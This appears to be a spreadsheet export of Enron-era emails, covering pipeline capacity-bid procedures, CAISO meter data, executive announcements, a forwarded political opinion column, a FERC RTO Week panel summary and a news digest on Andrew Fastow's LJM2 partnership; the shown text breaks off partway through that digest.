2. A shipper will be allowed to release and/or segment and release the _x000D_
capacity _x000D_
and shipper and replacement shipper may utilize any available points on _x000D_
Northwest's transmission system without impacting the discount for the _x000D_
original shipper. _x000D_
_x000D_
3. This prearranged offer is for a reservation contract demand rate.? In _x000D_
addition _x000D_
to the Reservation Charge Bid, shipper will pay the volumetric charge, the _x000D_
applicable surcharges and fuel. _x000D_
? _x000D_
_x000D_
PROCEDURE FOR BIDDING FOR _x000D_
AVAILABLE TRANSPORTATION CAPACITY _x000D_
_x000D_
The following guidelines will be adhered to for all posted packages of _x000D_
transportation _x000D_
capacity for electronic bid ("package or packages"): _x000D_
_x000D_
1. Shipper must submit a separate electronic bid for each package of _x000D_
available _x000D_
transportation capacity.? Multiple electronic bid(s) can be submitted for the _x000D_
total available transportation capacity under the specified package OR _x000D_
multiple _x000D_
rates can be submitted each for a partial amount of available transportation _x000D_
capacity under the specified package.? If the same Shipper submits multiple _x000D_
bids, _x000D_
the highest present value for such package of available transportation _x000D_
capacity _x000D_
shall be considered the valid bid. All other bids from the same Shipper for _x000D_
the _x000D_
same package of transportation capacity will be discarded. _x000D_
_x000D_
2. Northwest awards bids based on a net present value calculation.? If bid _x000D_
rate is _x000D_
less than minimum tariff rate, the following formula is utilized:? Bid Rate x _x000D_
FERC Interest Rate x The Maximum Bid Quantity x 365 days/100/12; or if the _x000D_
maximum rate is bid, the following formula is utilized:? Bid Rate x FERC _x000D_
Interest _x000D_
Rate x Maximum Bid Quantity x days bid/100. In case of a tie, each tied _x000D_
shipper _x000D_
will have the right to improve its bid by submitting an improved bid within _x000D_
24 _x000D_
hours of the bid close time.? Such improved bid shall be faxed to (801) _x000D_
584-7076 _x000D_
to Candace Karpakis or Patrick Aman.? If a tie still exists, such capacity _x000D_
shall _x000D_
be awarded on a prorata basis. _x000D_
_x000D_
3. Northwest will not accept bids with a primary contract term (Term) longer _x000D_
than _x000D_
indicated for the capacity unless maximum rate is bid. _x000D_
_x000D_
INSTRUCTIONS FOR CREATING A BID FOR _x000D_
NORTHWEST'S FIRM CAPACITY RELEASE _x000D_
OFFERS _x000D_
_x000D_
1. Select "CAPACITY RELEASE" application in Northwest Passage. _x000D_
2. Select "CREATE/SUB BID FOR NWP CAP" application.? All current offers will _x000D_
appear. _x000D_
3. Highlight the offer you are interested in by clicking the left mouse _x000D_
button _x000D_
on the offer. _x000D_
4. Select the "TERMS &amp; COND" button at the top of the screen, which is now _x000D_
active.? The screen will allow you to review the conditions of the offer. _x000D_
Close this screen when you have finished reviewing. _x000D_
5. At this point you can review current bids posted for this offer by _x000D_
selecting _x000D_
the "VIEW BID" button.? Close this screen when you have finished viewing. _x000D_
6. If you would like to create a bid for this offer, select "CREATE BID" _x000D_
button. _x000D_
7. If you want to bid the maximum rate for the capacity, select the "BID MAX _x000D_
RATE" button. _x000D_
8. Highlight the "END DATE" if you want to modify the end date of the term of _x000D_
your offer. _x000D_
9. If you want to modify the receipt/delivery point maximum and minimum _x000D_
volume, _x000D_
highlight the receipt/delivery point section with the left mouse button and _x000D_
modify accordingly. Select "SAVE".? If an error appears at the button of the _x000D_
screen, the error will need to be corrected and the data will need to be _x000D_
saved again.? If successful, a message will appear indicating the bid _x000D_
information has saved and the bid rate must be entered.? Select "OK". _x000D_
10. Select the "RATE" button.? Enter the bid rate.? Select "SAVE". _x000D_
_x000D_
You have just "CREATED" your bid for the offer.? You now need to _x000D_
"SUBMIT" your bid as follows: _x000D_
_x000D_
11. Close out of all screens and return to the "CAPACITY RELEASE" menu _x000D_
screens. _x000D_
_x000D_
12. To Submit or Review your bid(s), select the "REV/SUB/WDRW NWP CAP BID" _x000D_
button. _x000D_
All of your bids will appear.? Highlight the "BID IN DRAFT STATUS" that you _x000D_
would like to submit.? Select the "SUBMIT" button at the top of the screen _x000D_
topost the bid. _x000D_
_x000D_
To Withdraw your bid(s), select the "REV/SUB/WDRW NWP CAP" button. _x000D_
All of your bids will appear.? If the bid has not yet been submitted, _x000D_
highlight the "BID IN DRAFT STATUS" that you would like to withdraw. _x000D_
Select the "WITHDRAW" button at the top of the screen to withdraw the _x000D_
bid.? After a bid has been withdrawn, you can select the "DELETE" _x000D_
button at the top of the screen to delete it from the screen. _x000D_
NOTE:? After each selection, always "REFRESH" the screen to get the latest _x000D_
status. _x000D_
_x000D_
_x000D_
_x000D_
Word: F\Short Term/Capacity for Bid-All 2000 December 11 2000 01-186.doc </t>
  </si>
  <si>
    <t>Wed, 9 May 2001 12:28:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Enron Data for March 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Per my phone message._x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Alvarez, David_x000D_
&gt; Sent:	Wednesday, May 09, 2001 12:14 PM_x000D_
&gt; To:	Perez, Glen_x000D_
&gt; Cc:	Almeida, Keoni_x000D_
&gt; Subject:	Enron Data for March 2001_x000D_
&gt;_x000D_
&gt; Glen,_x000D_
&gt;_x000D_
&gt; Attached is a spreadsheet for the month of March. As you can see Enron_x000D_
&gt; seems to be reporting more load with the Meter Data Change that came in_x000D_
&gt; today for March 1 to March 4. The first column on the spreadsheet shows_x000D_
&gt; the data submitted prior to the Meter Data Change Request. The second_x000D_
&gt; column in each territory shows the changes requested by Enron._x000D_
&gt;_x000D_
&gt; The dashes (-) within the spreadsheet indicate zero data reported for that_x000D_
&gt; day._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;Enron March 2001.xls&gt;&gt;_x000D_
&gt;_x000D_
&gt; David Alvarez_x000D_
&gt; Data Quality_x000D_
&gt; (916) 608-5915_x000D_
&gt; Dalvarez@caiso.com_x000D_
&gt;_x000D_
_x000D_
 - Enron March 2001.xls </t>
  </si>
  <si>
    <t>Wed, 1 May 2002 13:11:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'executive.office@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">To: Enron Employees Worldwide _x000D_
From: Stephen Cooper _x000D_
Date: Wednesday, May 1, 2002_x000D_
_x000D_
It is with mixed emotion that I confirm that Dan Leff will be leaving Enron in mid-May.  Dan was approached by and has accepted an excellent position with another company.  Dan recently stepped up to manage the wholesale and retail businesses.  In a short time, he has developed a solid team and a clear plan that can move forward under the direction of Bob Semple from Zolfo Cooper and our funtional leaders including Jeremy Blachman, Anthony Dayao, Eric Holzer, Kyle Kitagawa, Don Miller, Vicki Sharp, Ed Smida, and Wade Stubblefield.  I am sorry to lose Dan, but I want to congratulate him and wish him well in his new career._x000D_
	</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 02:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jrogers@cinergy.com'})</t>
  </si>
  <si>
    <t>Ben,_x000D_
_x000D_
I hope I passed the test........The retreat went very well.  I've been_x000D_
thinking about your role at Cinergy and have concluded that involvement in_x000D_
the DG area is the best place for you to grow and develop as an executive._x000D_
The assignment will be tough because you will be front running the market._x000D_
But, the opportunity to develop an expertise in marketing in this area will_x000D_
be invaluable if the industry develops as I believe it will.  Let's talk._x000D_
_x000D_
Dad_x000D_
_x000D_
-----Original Message-----_x000D_
From: Benjamin.Rogers@enron.com [mailto:Benjamin.Rogers@enron.com]_x000D_
Sent: Monday, October 02, 2000 1:17 PM_x000D_
To: jrogers@cinergy.com_x000D_
Subject:_x000D_
_x000D_
_x000D_
This is a test to see if you are checking your e-mail these days.  I have a_x000D_
feeling that you have not been, due to your board presentation last week._x000D_
Mike M. tells me he will be up there today - hope that goes well for you_x000D_
guys.  I really think there could be something there.  Please give me a_x000D_
call sometime soon.  Things are going well here and we have been quite_x000D_
busy.  Give me a call sometime.  The number is (713) 853-7998. See ya!_x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 6 Apr 2000 01:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Coronado Pipeline</t>
  </si>
  <si>
    <t xml:space="preserve">Well, aren't you just full of wisdom!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
James T Javins@EES_x000D_
04/06/2000 08:02 AM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Coronado Pipeline  _x000D_
_x000D_
This was a seasonal thing.  It may pay to make a call to CNG and confirm that _x000D_
all is back to normal._x000D_
_x000D_
Jim_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 04:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'william.evans@citicorp.com'})</t>
  </si>
  <si>
    <t>Re: Cuiaba-Milbank Legal</t>
  </si>
  <si>
    <t xml:space="preserve">I'll touch base with the appropriate folks._x000D_
_x000D_
Regards,_x000D_
_x000D_
Rob_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"William G. Evans" &lt;william.evans@citicorp.com&gt; on 02/06/2001 12:21:40 PM_x000D_
To: Rob Gay &lt;rob.g.gay@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Cuiaba-Milbank Legal_x000D_
_x000D_
_x000D_
Rob_x000D_
_x000D_
I just spoke to Mike Banks at Milbank who said payment has not yet been_x000D_
received re: their invoice.  He has had some conversations with Robert_x000D_
Novak and others at Enron and undertands that payment has been approved_x000D_
but for some reason not yet made.  I would appreciate if you could look_x000D_
into this to see what the status is._x000D_
_x000D_
Mike understands that we are in a holding pattern on the permanent_x000D_
financing until the changes in the project are completed._x000D_
_x000D_
Regards_x000D_
Bill_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 07:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 11/13/2000 _x000D_
03:39 PM ---------------------------_x000D_
_x000D_
_x000D_
Ceci Twachtman@EES_x000D_
11/10/2000 05:48 PM_x000D_
To: Linda Ng/HOU/EES@EES, smbradshaw@msn.com, Patricia Slaughter/HOU/EES@EES, _x000D_
Justin Townsley/HOU/EES@EES, Karl Klicker/HOU/EES@EES, Rita Hartfield/Enron _x000D_
Communications@Enron Communications, Patricia Slaughter/HOU/EES@EES, David _x000D_
Chang/Enron Communications@Enron Communications, Doug Leach/HOU/ECT@ECT, Ted _x000D_
C Bland/HOU/ECT@ECT, Craig Childers/HOU/EES@EES, Terry Pierce/Enron _x000D_
Communications@Enron Communications, Roy Hartstein/NA/Enron@Enron, Anthony _x000D_
Mends/Enron Communications@Enron Communications, Benjamin Rogers/HOU/ECT@ECT, _x000D_
Lynette Malone/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Thomas E _x000D_
White/HOU/EES@EES, Pat Keelan/HOU/EES@EES, Bessik Matchavariani/Enron _x000D_
Communications@Enron Communications_x000D_
cc:  _x000D_
Subject: Article_x000D_
_x000D_
VERY INTERESTING..._x000D_
---------------------- Forwarded by Ceci Twachtman/HOU/EES on 11/10/2000 _x000D_
05:23 PM ---------------------------_x000D_
_x000D_
_x000D_
David Haug@ENRON_DEVELOPMENT_x000D_
11/10/2000 03:19 PM_x000D_
To: mklepper@skadden.com, Ceci Twachtman@Enron Communications_x000D_
cc:  _x000D_
Subject: Article_x000D_
_x000D_
_x000D_
---------------------- Forwarded by David Haug/ENRON_DEVELOPMENT on _x000D_
11/10/2000 03:16 PM ---------------------------_x000D_
_x000D_
_x000D_
Steven Haug@ENRON_x000D_
11/10/2000 11:07 AM_x000D_
To: Larry Abbott/OTS/Enron@ENRON, Mike Ames/OTS/Enron@Enron, Mike _x000D_
Bonnstetter/ET&amp;S/Enron@ENRON, Max Brown/OTS/Enron@Enron, rd_cates@yahoo.com, _x000D_
John Gormley/ET&amp;S/Enron@Enron, Jeff Hamlin/ET&amp;S/Enron@Enron, Danny _x000D_
Holguin/ET&amp;S/Enron@Enron, Steve Tarter/ET&amp;S/Enron@Enron, Al _x000D_
Vandarwarka/ET&amp;S/Enron@Enron, Jon Wernette/ET&amp;S/Enron@Enron, Norma _x000D_
Nusz-Chandler/NPNG/Enron@ENRON, Virgil Pfennig/NPNG/Enron@ENRON, Gary _x000D_
Numedahl/ET&amp;S/Enron@ENRON, vdicke@courier.esu11.k12.ne.us, David _x000D_
Haug/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, haug@tconl.com, vghaug@nque.com, _x000D_
geoff@tconl.com, karenhaug@hotmail.com, laura.haug@amerus.com, _x000D_
CindyJ.@prodigy.net, elmo413@carrollsweb.com, Marlene McCoy/ET&amp;S/Enron@ENRON, _x000D_
daisyd43@hotmail.com, John W Rose/ET&amp;S/Enron@ENRON, omaharoses@hotmail.com, _x000D_
Norm Ruiz/ET&amp;S/Enron@ENRON, aly_gal@hotmail.com, Neta Zitnik/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Article_x000D_
_x000D_
DO YOU THINK HE WOULD??_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
 Al Gore and _x000D_
Constitution _x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
, 2000 WorldNetDaily.com _x000D_
_x000D_
Ever since I saw Al Gore give that uncharacteristically statesman-like speech _x000D_
defending the integrity of the Electoral College system under the _x000D_
Constitution of the United States, I've been scratching my head trying to _x000D_
figure it out. _x000D_
_x000D_
Who was this guy? Was this the same Al Gore who has demonstrated -- time and _x000D_
time again -- so little respect for the Constitution during the last eight _x000D_
years? Why was he giving up on the idea of a challenge to the Electoral _x000D_
College, when it seemed many in his camp were banking on that as their last _x000D_
line of defense? _x000D_
_x000D_
Well, I think I have figured it out. Actually, there are two possibilities. _x000D_
_x000D_
The first thought that came to me was that this was Al Gore's _x000D_
"Don't-watch-the-man-behind-the-curtain speech." While he was extolling the _x000D_
virtues of the Constitution, his minions in Florida -- from Bill Daley to _x000D_
Jesse Jackson -- were busy subverting it by any means necessary. It was Al _x000D_
Gore's way of establishing public plausible deniability. He stood above the _x000D_
fray, while his cohorts did the dirty work. _x000D_
_x000D_
But, more recently, another thought has occurred to me -- a darker, more _x000D_
sinister thought. I hope I am wrong. I pray that, this time, I am _x000D_
overestimating the deviousness of Al Gore. But that, of course, is always a _x000D_
difficult task. _x000D_
_x000D_
Think, for a moment, why Al Gore would suddenly be reading and citing the _x000D_
Constitution. _x000D_
_x000D_
The answer is that, in this instance, it gives him all the power. What do I _x000D_
mean? _x000D_
_x000D_
Who is it, under the Constitution, that is specifically charged with _x000D_
certifying the Electoral College votes of each state? You guessed it. The _x000D_
president of the U.S. Senate, which also happens to be the vice president of _x000D_
the United States. That's right. The day those Electoral College votes go to _x000D_
the Senate to be counted and certified to choose the next president of these _x000D_
United States, Al Gore will be holding all the cards. _x000D_
_x000D_
"Oh, Farah," you say, "you don't think Al Gore would tamper with the results _x000D_
in any way with the whole world watching, do you?" _x000D_
_x000D_
Well, let's think about what has been happening in Florida for the last _x000D_
several days. Al Gore's campaign managers have been whipping up hysteria _x000D_
stating that the will of the people in that state is being subverted. _x000D_
_x000D_
They are filing lawsuits. They are organizing marches. They are all but _x000D_
accusing the Bush campaign of voter fraud. _x000D_
_x000D_
Listen to what Bill Daley has to say: "More than 100 million Americans voted _x000D_
on Tuesday and more voted for Al Gore than George Bush. Here in Florida it _x000D_
also seems very likely that more voters went to the polls believing that they _x000D_
were voting for Al Gore than for George Bush. If the will of the people is to _x000D_
prevail Al Gore should be awarded a victory in Florida, and be our next _x000D_
president of the United States." _x000D_
_x000D_
They've decided that no matter what the actual vote count shows, Gore wins. _x000D_
_x000D_
Now, all Gore has to do on that fateful day in the U.S. Senate is reject for _x000D_
certification the Electoral College votes of Florida, and he wins the _x000D_
majority and becomes president. Sorry, Bush fans. I don't think there's a _x000D_
thing you can do about it other than protest, complain and stomp your feet. _x000D_
Better start planning your legal strategy now. I'll bet Al Gore's transition _x000D_
team is already hard at work. Barbra Streisand is probably making plans to _x000D_
sing at the Inauguration. Alec Baldwin is unpacking his bags. This could be a _x000D_
fait accompli. I guarantee you a counter to this bold move is not in the Bush _x000D_
campaign's playbook. _x000D_
_x000D_
The Gore campaign, still working overtime, has laid the groundwork for the _x000D_
challenge. The Florida vote is tainted, they say. It's too close to call. Too _x000D_
many irregularities. The vote can simply be dismissed by the constitutional _x000D_
authority -- Vice President Al Gore. _x000D_
_x000D_
Would you put it past him? I sure wouldn't._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
_x000D_
Joseph Farah is editor and chief executive officer of WorldNetDaily.com and _x000D_
writes a daily column. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 Oct 2001 06:26:06 -0700 (PDT)</t>
  </si>
  <si>
    <t>Chase Master Agreement - "no more confirms"</t>
  </si>
  <si>
    <t>Tanya:_x000D_
_x000D_
EOL is asking for the Chase master to be amended to eliminate the need for confirms on EOL trades.  Do we need to meet to determine which Chase master (i.e., Chase or JP Morgan) should be amended (or both)?  Do we want to begin the upgrade process?   Please call._x000D_
_x000D_
Also, are you available for the 9:30 Hanover call?_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Sat, 25 Nov 2000 12:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Hard Lessons from California</t>
  </si>
  <si>
    <t>Aleck:_x000D_
_x000D_
I'll take a look at it.  If I have any comments, I'll forward them along.  _x000D_
Also, I may forward along some very slight changes to the numbers on the _x000D_
ISO's RFP "experience," should you decide you want to incorporate those _x000D_
"lessons" into your presentation. I'll provide any amendments to those _x000D_
numbers by tomorrow._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 06:39:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mtg. w/Bill Bradford &amp; Dave Gordy, Tom Gros, Brad Romine  EB 2802_x000D_
  Re: Commodity Logic  (Jessica)</t>
  </si>
  <si>
    <t>x-36114 Dorthy Youngblood</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 20:28:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rogers.herndon@enron.com', 'tom.may@enron.com', 'susan.lindberg@enron.com', 'lloyd.will@enron.com', 'dana.davis@enron.com', 'm..presto@enron.com', 'd..baughman@enron.com', 'janelle.scheuer@enron.com', 'gautam.gupta@enron.com', 'narsimha.misra@enron.com'})</t>
  </si>
  <si>
    <t>RTO Week -- Summary of Day One Panel</t>
  </si>
  <si>
    <t>Today was the first day of FERC's "RTO Week" in Washington, D.C.  The topic of today's panel was "RTO Markets and Design:  Required Markets and Optional Markets."  The issues in both panels were quickly merged and the two panels discussed all of the issues.  _x000D_
_x000D_
Panel One:  Mandatory RTO Markets_x000D_
_x000D_
The morning panel consisted of the following participants:  Peter Cramton (University of Maryland), David Hadley (Indiana PSC), Mark Kleinginna (Ormet), John Meyer (Reliant), John O'Neal (Mirant), and Roy Shanker (consultant for generators in the Northeast).  _x000D_
_x000D_
Energy Spot Market_x000D_
_x000D_
There was unanimous agreement among these panelists that the RTO must run a real time energy, or spot, market.  Most panelists agreed that the spot market should be a bid-based, security-constrained system with economic dispatch.  In response to a question from Pat Wood, most also agreed that nodal (LMP) pricing should be used in the spot market, although John Meyer from Reliant stated that zonal pricing is used in ERCOT and that works also.  _x000D_
_x000D_
Day Ahead Market and Balanced Versus Unbalanced Schedules_x000D_
_x000D_
Most of the panelists said that the RTO should not require balanced schedules.  Peter Cramton said that with a day-ahead market, no need for balanced schedules because the real time market prices will discipline behavior.  John Meyer agrees, saying if there is no balanced schedules requirement, then there might be a need for a day-ahead market.  John notes that ERCOT has a balanced schedule requirement.  John also said that imbalance penalties could be appropriate for imbalances that hurt the system.   Roy Shanker also said FERC needs either a balanced schedules requirement (which he does not recommend) or have a day-ahead market._x000D_
_x000D_
ICAP Requirement_x000D_
_x000D_
Most of the panelists (except Peter Cramton -- University of MD) support an ICAP requirement.  However, none of the panelists could point to an effective ICAP market (Roy Shanker says he has an idea of what would work - we will probably see this in comments in the ICAP proceeding due later this week).  _x000D_
_x000D_
Mark from Ormet kept bringing the message back to the need to know the rules and know that the rules will not change substantially over time.  Mark said liquidity in PJM does not help him move power to the Midwest since the rules are undefined outside of PJM.  He cannot enter into long-term contracts because he does not know what the rules will be one or more years out.  He also said you can have an ICAP market but market participants have to be able to meet ICAP requirements through load response._x000D_
_x000D_
 Standardized Markets_x000D_
_x000D_
 Most of the panelists agreed that the mandatory markets should be real time and day-ahead energy markets, spinning and non-spinning reserves and regulation should also be required and be standardized._x000D_
_x000D_
Massey asked if the costs to standardize are outweighed by the benefits.  Roy Shanker said the Northeast works so FERC should not change it.  Even if FERC does not require standardization between the RTOs, creating large RTOs and fixing the problems within the RTOs will be a big improvement.  Mark with Ormet and the Indiana Commissioner both urged FERC to standardize the mandatory markets among the RTOs._x000D_
_x000D_
Panel Two:  Optional RTO Markets_x000D_
_x000D_
The afternoon panel consisted of the following participants:  Fiona Woolfe (lawyer with experience in England and Wales pool); Roy Thilly (Wisconsin Public Power Inc.); Richard Pierce (professor at George Washington); Glen Arthur (Connecticut PSC); Steve Naumann (Commonwealth Edison); Ed Cazalet (APX)._x000D_
_x000D_
This panel was intended to cover optional market issues, including whether a day-ahead market is needed and whether there should be ICAP markets.  This panel addressed these issues as well as the need for a real time market, market monitoring, and other issues._x000D_
_x000D_
Mandatory Markets_x000D_
_x000D_
Other than Ed Cazalet (APX), the other panelists for the most part agree that the RTO should run a real time and day-ahead energy market, ancillary services markets, and there must be an ICAP requirement.  Ed Cazalet believes that there only needs to be a small balancing market (perhaps with balanced schedules requirements) and leave the creation of any other markets to independent entities to create._x000D_
_x000D_
 ICAP_x000D_
_x000D_
 Most of the panelists believe that the RTO should provide a day-ahead market, congestion management and ancillary services.  Most also favor an ICAP requirement and market._x000D_
_x000D_
Pat Wood said he is not convinced that a blanket ICAP requirement is needed on Day One.  He has been considering an ICAP requirement that does not apply until triggers are reached, and perhaps that should be considered here as well.  He has also been talking with a Northeast regulator about having different requirements for states depending on whether they have retail access or not._x000D_
_x000D_
Shelton Cannon (Staff) asked the panelists to assume one Midwest RTO - can there be different ICAP requirements within the RTO?  Most panelists agree that if the ICAP rules are the same within the RTO, that there could be percentage requirement deviations._x000D_
_x000D_
Day Two of RTO Week focuses on Congestion Management in the morning and Transmission Planning and Expansion in the afternoon.  We will get summaries out on these panels tomorrow._x000D_
_x000D_
Please call me with questions or comments._x000D_
_x000D_
Sarah</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 06:04:10 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Enron CFO's Partnership Had Millions in Profit_x000D_
The Wall Street Journal, 10/19/01_x000D_
Enron CFO Profited From Partnerships With Company, WSJ Reports_x000D_
Bloomberg, 10/19/01_x000D_
_x000D_
The New Power Company Revises Its Netting Agreement With Enron; Provides Fo=_x000D_
r Receivables and Inventory Financing_x000D_
Business Wire, 10/19/01_x000D_
_x000D_
The Five Dumbest Things on Wall Street This Week_x000D_
TheStreet.com, 10/19/01_x000D_
_x000D_
K Street's Top 10: The Shifting Lineup_x000D_
National Journal, 10/20/01_x000D_
Houston entrepreneurs added to Texas Business Hall of Fame_x000D_
Houston Chronicle, 10/20/01_x000D_
Recession, Budget Cuts, Travel Fears To Subdue LME Week_x000D_
Dow Jones Commodities Service, 10/19/01_x000D_
HC to hear DPC's plea_x000D_
The Times of India, 10/19/01_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Enron CFO's Partnership Had Millions in Profit_x000D_
By Rebecca Smith and John R. Emshwiller_x000D_
Staff Reporters of The Wall Street Journal_x000D_
_x000D_
10/19/2001_x000D_
The Wall Street Journal_x000D_
C1_x000D_
(Copyright (c) 2001, Dow Jones &amp; Company, Inc.)_x000D_
_x000D_
A limited partnership organized by Enron Corp.'s chief financial officer, A=_x000D_
ndrew S. Fastow, realized millions of dollars in profits in transactions it=_x000D_
 did with Enron, according to an internal partnership document.=20_x000D_
The partnership, in some instances, benefited from renegotiating the terms =_x000D_
of existing deals with the Houston energy company in ways that improved the=_x000D_
 partnership's financial positions or reduced its risk of losses._x000D_
Mr. Fastow, and possibly a handful of partnership associates, realized more=_x000D_
 than $7 million last year in management fees and about $4 million in capit=_x000D_
al increases on an investment of nearly $3 million in the partnership, whic=_x000D_
h was set up in December 1999 principally to do business with Enron.=20_x000D_
The profits from the deals were disclosed in a financial report to investor=_x000D_
s in the partnership, LJM2 Co-Investment LP, that was signed by Mr. Fastow =_x000D_
as the general partner and dated April 30. In one case, the report indicate=_x000D_
s the partnership was able to improve profits by terminating a transaction =_x000D_
early.=20_x000D_
The LJM2 arrangement has become controversial for Enron, as shareholders an=_x000D_
d analysts have raised questions about whether it posed a conflict by putti=_x000D_
ng the company's chief financial officer, who has a fiduciary duty to Enron=_x000D_
 shareholders, in a position of reaping financial rewards for representing =_x000D_
LJM2 investors in business deals with Enron. Investors in LJM2 include Wach=_x000D_
ovia Corp., General Electric Co.'s General Electric Capital Corp. and Credi=_x000D_
t Suisse Group's Credit Suisse First Boston.=20_x000D_
Attention has focused on Mr. Fastow's partnership activities at a tumultuou=_x000D_
s time for Enron, which over the past decade grew enormously by becoming th=_x000D_
e nation's biggest energy-trading company.=20_x000D_
This year, though, it has been hit by a string of troubles, from soured bus=_x000D_
iness initiatives to executive departures. On Tuesday, Enron announced a $6=_x000D_
18 million third-quarter loss, because of a $1.01 billion write-off on inve=_x000D_
stments in broadband telecommunications, retail energy services and Azurix =_x000D_
Corp., a water company. A small chunk of that write-off, about $35 million,=_x000D_
 was attributed to ending certain LJM2-related transactions. That terminati=_x000D_
on also produced a $1.2 billion reduction in Enron shareholder equity as th=_x000D_
e company decided to repurchase 55 million shares that had been part of LJM=_x000D_
2 deals.=20_x000D_
At 4 p.m. in New York Stock Exchange composite trading, Enron was down 9.9%=_x000D_
, or $3.20, to $29 a share. Within the past year, the stock had topped $80 =_x000D_
a share.=20_x000D_
Enron officials didn't have any comment about the LJM2 partnership document=_x000D_
. Enron has consistently said its dealings with LJM2 have been proper. They=_x000D_
 said the LJM2 deals, like ones done with other parties, were aimed at help=_x000D_
ing hedge against fluctuating market values of its assets and adding source=_x000D_
s of capital.=20_x000D_
Mr. Fastow has declined several requests for an interview about LJM2. In la=_x000D_
te July, he formally severed his ties with LJM2, as a result of what Enron =_x000D_
officials said was growing unease by Wall Street analysts and major shareho=_x000D_
lders. Mr. Fastow has been finance chief of Enron since 1997 and has been w=_x000D_
ith the firm 11 years, which included extensive work setting up and managin=_x000D_
g company investments.=20_x000D_
Michael Kopper, a former Enron executive who an Enron spokesman said is now=_x000D_
 helping to operate LJM2, declined to comment. He also wouldn't describe hi=_x000D_
s relation to LJM2.=20_x000D_
In his April 30 report, Mr. Fastow said the partnership, which raised $394 =_x000D_
million, had invested in several Enron-related deals involving power plants=_x000D_
 and other assets as well as company stock. The document said LJM2 sought a=_x000D_
 29% internal rate of return. That was down from a 48% targeted rate of ret=_x000D_
urn at the end of 2000, which the document said was due in part to a declin=_x000D_
e in the value of LJM2's investment in New Power Co., an Enron-related ener=_x000D_
gy retailer. In some transactions, LJM2 did much better than the 29% target=_x000D_
, though this sometimes involved renegotiating individual deals.=20_x000D_
In September 2000, the partnership invested $30 million in "Raptor III," wh=_x000D_
ich involved writing put options committing LJM2 to buy Enron stock at a se=_x000D_
t price for six months. Four months into this deal, LJM2 approached Enron t=_x000D_
o settle the investment early, "causing LJM2 to receive its $30 million cap=_x000D_
ital invested plus $10.5 million in profit," the report said. The renegotia=_x000D_
tion was before a decline in Enron's stock price, which could have forced L=_x000D_
JM2 to buy Enron shares at a loss of as much as $8 each, the document indic=_x000D_
ated._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
_x000D_
Enron CFO Profited From Partnerships With Company, WSJ Reports_x000D_
2001-10-19 01:00 (New York)_x000D_
_x000D_
_x000D_
     Houston, Oct. 18 (Bloomberg) -- Enron Corp.'s Chief Financial_x000D_
Officer Andrew Fastow realized profits through a limited_x000D_
partnership that did business with Enron, the Wall Street Journal_x000D_
reported, citing an internal partnership document._x000D_
_x000D_
     LJM2 Co-Investment LP, of which Fastow is a general partner,_x000D_
made millions of dollars on transactions with Enron, the paper_x000D_
said. Fastow and possibly a handful of partnership associates made_x000D_
$7 million last year in management fees and about $4 million in_x000D_
capital increases on an investment of about $3 million in the_x000D_
partnership, the paper said._x000D_
_x000D_
     Enron shareholder Fred Greenberg filed a lawsuit yesterday,_x000D_
alleging that Enron's board cost the company at least $35 million_x000D_
by allowing Fastow to manage partnerships that bought Enron_x000D_
assets. Enron reported $1.01 billion in third-quarter losses from_x000D_
failed investments._x000D_
_x000D_
_x000D_
The Five Dumbest Things on Wall Street This Week_x000D_
By K.C. Swanson &lt;mailto:kcswanson@thestreet.com&gt;_x000D_
Staff Reporter_x000D_
TheStreet.com_x000D_
10/19/2001 06:59 AM EDT_x000D_
URL: &lt;http://www.thestreet.com/markets/dumbest/10002661.html&gt;_x000D_
_x000D_
1. Bayer Fighting the Bears?_x000D_
One beneficiary of the anthrax scare has been Bayer AG (BAYZY:OTC BB ADR - =_x000D_
